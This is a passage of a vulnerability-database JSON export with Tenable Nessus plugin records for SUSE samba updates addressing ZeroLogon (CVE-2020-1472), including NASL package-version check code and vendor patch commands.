"p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2724-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143807", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2724-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143807);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202724-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a60bae9\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2724=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2724=1\n\nSUSE Linux Enterprise High Availability 12-SP2 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP2-2020-2724=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-krb5pac0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-nbt0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr-standard0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libndr0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libnetapi0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-credentials0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-errors0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-hostconfig0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-passdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamba-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsamdb0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbconf0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libsmbldap0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libtevent-util0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libwbclient0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-client-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-debugsource-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-libs-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"samba-winbind-debuginfo-4.4.2-38.36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:27:33", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from previous versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0", "p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt-devel", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard-devel", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi-devel", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials-devel", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors-devel", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb-devel", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-policy-devel", "p-cpe:/a:novell:suse_linux:libsamba-policy0", "p-cpe:/a:novell:suse_linux:libsamba-util-devel", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb-devel", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-devel", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf-devel", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap-devel", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util-devel", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient-devel", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-core-devel", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-2719-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143641", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2719-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143641);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n 